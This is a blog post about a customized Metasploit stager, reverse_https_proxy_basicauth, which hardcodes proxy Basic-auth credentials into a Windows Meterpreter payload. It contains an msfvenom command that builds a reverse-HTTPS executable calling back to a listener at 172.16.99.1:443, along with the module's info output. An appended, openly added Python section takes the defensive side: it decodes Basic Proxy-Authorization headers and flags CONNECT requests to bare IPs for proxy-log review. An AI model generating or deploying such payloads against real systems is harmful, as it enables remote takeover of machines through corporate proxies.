Metasploit stager: reverse_https with basic authentication against proxy
reverse_https does an excellent job of supporting proxy servers and NTLM authentication, but there are situations where the proxy server only supports basic authentication, and where you hold a valid username and password pair.
Unlike NTLM, the username and password used for basic authentication remain within the scope of the process that authenticated (for example, in your browser after a successful authentication against the proxy server). This is why reverse_http(s) knows nothing about this password: the reverse_http(s) stager uses the WinInet API and lets Windows manage how to reach the Internet.
Back to basic authentication: this customized version of reverse_https lets you embed a valid username and password inside the payload, so the stager can authenticate properly against the proxy server. The proxy settings (IP, port, proxy.pac, …) are still handled automatically by WinInet.
2. Usage example
2.1. EXE generation
    msfvenom -p windows/meterpreter/reverse_https_proxy_basicauth \
      -f exe LPORT=443 LHOST=172.16.99.1 PROXY_AUTH_USER=mylongusername \
      PROXY_AUTH_PASS=mylongpassword123 > /tmp/msf.exe
2.2. Module info
    msf > info payload/windows/meterpreter/reverse_https_proxy_basicauth

           Name: Windows Meterpreter (Reflective Injection), Reverse HTTPS Stager (proxy basic auth)
         Module: payload/windows/meterpreter/reverse_https_proxy_basicauth
        Version: 1, 15548, 14976
       Platform: Windows
           Arch: x86
    Needs Admin: No
     Total size: 425
           Rank: Normal

    Provided by:
      skape
      sf
      hdm

    Basic options:
      Name             Current Setting  Required  Description
      ----             ---------------  --------  -----------
      EXITFUNC         process          yes       Exit technique: seh, thread, process, none
      LHOST                             yes       The local listener hostname
      LPORT            8443             yes       The local listener port
      PROXY_AUTH_PASS  pass123          yes       Proxy authentication (password)
      PROXY_AUTH_USER  username         yes       Proxy authentication (username)

    Description:
      Tunnel communication over HTTP using SSL, using hardcoded proxy auth
      settings, Inject the meterpreter server DLL via the Reflective Dll
      Injection payload (staged)
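One caveat worth keeping in mind: Basic authentication is only base64, so the credentials embedded in the payload are readable by the proxy and by anything that captures the traffic between the client and the proxy, and the stager's CONNECT to a bare LHOST IP is visible in the same place. The following added example (not part of the original post or of the Metasploit module) parses a constructed CONNECT request head as a proxy log reviewer would see it, decodes the Basic Proxy-Authorization header and returns review findings; the request text, the helper names and the finding labels are assumptions made here.

```python
import base64
import ipaddress
from typing import Dict, List, Optional, Tuple
# Constructed sample of what the proxy (or a capture in front of it) sees: the
# msfvenom credentials above, base64-encoded here so the sample is correct by construction.
_CRED = base64.b64encode(b"mylongusername:mylongpassword123").decode()
SAMPLE_CONNECT = (
    "CONNECT 172.16.99.1:443 HTTP/1.1\r\n"
    "Host: 172.16.99.1:443\r\n"
    f"Proxy-Authorization: Basic {_CRED}\r\n"
    "\r\n"
)

def parse_request(raw: str) -> Tuple[str, str, Dict[str, str]]:
    """Split an HTTP request head into (method, target, lowercase header map)."""
    lines = raw.split("\r\n\r\n", 1)[0].split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers

def decode_basic_proxy_auth(headers: Dict[str, str]) -> Optional[Tuple[str, str]]:
    """Return (user, password) from a Basic Proxy-Authorization header, else None.
    Basic is only base64: whoever sees the request sees the password."""
    scheme, _, token = headers.get("proxy-authorization", "").partition(" ")
    if scheme.lower() != "basic" or not token:
        return None
    try:
        user, _, password = base64.b64decode(token, validate=True).decode().partition(":")
    except (ValueError, UnicodeDecodeError):
        return None
    return user, password

def review_connect(raw: str) -> List[str]:
    """Findings a proxy-log reviewer cares about for one request (labels are assumptions)."""
    method, target, headers = parse_request(raw)
    findings: List[str] = []
    if method != "CONNECT":
        return findings
    host, _, port = target.rpartition(":")
    try:
        ipaddress.ip_address(host)
        findings.append(f"connect-to-bare-ip:{host}:{port}")  # browsers normally CONNECT to names
    except ValueError:
        pass
    if decode_basic_proxy_auth(headers) is not None:
        findings.append("basic-proxy-auth-in-clear")  # credentials recoverable from the wire
    return findings
```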
Enjoy :)
© 2012 – 2014, Fun Over IP. All rights reserved.